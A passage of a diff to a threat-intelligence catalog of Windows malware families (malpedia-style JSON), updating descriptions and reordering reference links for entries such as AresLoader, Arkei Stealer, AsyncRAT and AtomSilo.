"https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax", @@ -13175,7 +13790,7 @@ "value": "Arefty" }, { - "description": "Malware derived from the source code of win.kronos.", + "description": "A banking trojan, derived from the source code of win.kronos. In August 2022 it started to incorporate DGA code from win.qakbot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ares", @@ -13189,14 +13804,14 @@ "value": "Ares (Windows)" }, { - "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums “RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.", + "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums \u201cRAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed \u201cProject Ares,\u201d was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer \u201cCerberSec.\u201d\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader", - "https://intel471.com/blog/new-loader-on-the-bloc-aresloader", - "https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html", "https://flashpoint.io/blog/private-malware-for-sale-aresloader/", "https://twitter.com/k3dg3/status/1636873721200746496", + "https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html", + "https://intel471.com/blog/new-loader-on-the-bloc-aresloader", "https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/" ], "synonyms": [], @@ -13210,8 +13825,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arguepatch", - "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions" + "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions", + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" ], "synonyms": [], "type": [] @@ -13226,8 +13841,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody", "https://medium.com/insomniacs/aria-body-loader-is-that-you-53bdd630f8a1", "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", - "https://securelist.com/it-threat-evolution-q2-2020/98230", - "https://securelist.com/naikons-aria/96899/" + "https://securelist.com/naikons-aria/96899/", + "https://securelist.com/it-threat-evolution-q2-2020/98230" ], "synonyms": [], "type": [] @@ -13240,9 +13855,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher", - "https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant", + "https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks", - "https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/" + "https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant" ], "synonyms": [], "type": [] @@ -13283,18 +13898,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", - "https://isc.sans.edu/diary/rss/28468", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://threatmon.io/arkei-stealer-analysis-threatmon/", + "https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view", + "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", "https://forensicitguy.github.io/analyzing-stealer-msi-using-msitools/", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://ke-la.com/information-stealers-a-new-landscape/", "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer", - "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", "https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets", - "https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view" + "https://isc.sans.edu/diary/rss/28468", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://threatmon.io/arkei-stealer-analysis-threatmon/", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [ "ArkeiStealer" @@ -13305,7 +13920,7 @@ "value": "Arkei Stealer" }, { - "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.", + "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It\u2019s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat", @@ -13322,9 +13937,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", - "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/", "https://twitter.com/Racco42/status/1001374490339790849", - "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" + "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/" ], "synonyms": [], "type": [] @@ -13352,12 +13967,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", "https://www.freebuf.com/articles/database/192726.html", - "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/", - "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english", - "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", - "https://securelist.com/apt-trends-report-q1-2021/101967/" + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" ], "synonyms": [], "type": [] @@ -13407,8 +14022,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", - "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", + "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" ], "synonyms": [ @@ -13425,8 +14040,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] @@ -13439,21 +14054,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth", - "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", - "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", - "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", - "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", + "https://blog.easysol.net/meet-lucifer-international-trojan/", "https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962", "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", + "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", "https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/", - "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt", - "https://blog.easysol.net/meet-lucifer-international-trojan/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", + "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", + "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", "https://isc.sans.edu/diary/27482", - "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/" + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [ "Guildma" @@ -13463,6 +14078,19 @@ "uuid": "0cdb83dd-106b-458e-8d04-ca864281e06e", "value": "Astaroth" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.astasia", + "https://twitter.com/MalGamy12/status/1690100567756906497" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6cc38bdd-f7ac-4775-bc41-69e72b761ab5", + "value": "Astasia" + }, { "description": "", "meta": { @@ -13480,94 +14108,98 @@ "value": "AstraLocker" }, { - "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.", + "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim\u2019s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", - "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", + "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique", + "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", + "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", + "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader", + "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.esentire.com/blog/asyncrat-activity", + "https://blog.morphisec.com/syk-crypter-discord", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#", "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://community.riskiq.com/article/24759ad2", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware", - "https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf", + "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html", + "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection", + "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html", "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", + "https://community.riskiq.com/article/3929ede0/description", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", + "https://twitter.com/MsftSecIntel/status/1392219299696152578", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", + "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser", + "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat", + "https://labs.k7computing.com/?p=21759", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://community.riskiq.com/article/ade260c6", + "https://aidenmitchell.ca/asyncrat-via-vbs/", + "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html", "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/", - "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", - "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia", - "https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies", - "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/", - "https://twitter.com/MsftSecIntel/status/1392219299696152578", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader", - "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", - "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", - "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat", - "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://labs.k7computing.com/?p=21759", - "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", - "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html", - "https://blog.netlab.360.com/purecrypter", - "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", - "https://twitter.com/vxunderground/status/1519632014361640960", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/", "https://twitter.com/ESETresearch/status/1449132020613922828", - "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html", - "https://www.esentire.com/blog/asyncrat-activity", - "https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight", - "https://eln0ty.github.io/malware%20analysis/asyncRAT/", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper", - "https://aidenmitchell.ca/asyncrat-via-vbs/", - "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", - "https://community.riskiq.com/article/3929ede0/description", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://embee-research.ghost.io/shodan-censys-queries/", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", - "https://threatpost.com/ta2541-apt-rats-aviation/178422/", - "https://community.riskiq.com/article/ade260c6", - "https://blog.morphisec.com/syk-crypter-discord", - "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", - "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", + "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies", + "https://twitter.com/vxunderground/status/1519632014361640960", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html", + "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign", + "https://community.riskiq.com/article/24759ad2", + "https://mssplab.github.io/threat-hunting/2023/05/19/malware-src-asyncrat.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf", "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html", - "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", - "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html", - "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", - "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader", - "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser", - "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/" + "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://blog.netlab.360.com/purecrypter", + "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat", + "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", + "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", + "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://eln0ty.github.io/malware%20analysis/asyncRAT/", + "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html" ], "synonyms": [], "type": [] @@ -13618,8 +14250,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [], @@ -13647,10 +14279,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", - "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" + "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf", + "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [], "type": [] @@ -13659,19 +14291,19 @@ "value": "ATMSpitter" }, { - "description": "", + "description": "According to PCrisk, AtomSilo is a type of malware that blocks access to files by encrypting them and renames every encrypted file by appending the \".ATOMSILO\" to its filename. It renames \"1.jpg\" to \"1.jpg.ATOMSILO\", \"2.jpg\" to \"2.jpg.ATOMSILO\", and so on. As its ransom note, AtomSilo creates the \"README-FILE-#COMPUTER-NAME#-#CREATION-TIME#.hta\" file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo", + "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://twitter.com/siri_urz/status/1437664046556274694?s=20", "https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/", "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/", "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", "https://www.zscaler.com/blogs/security-research/atomsilo-ransomware-enters-league-double-extortion", - "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/", - 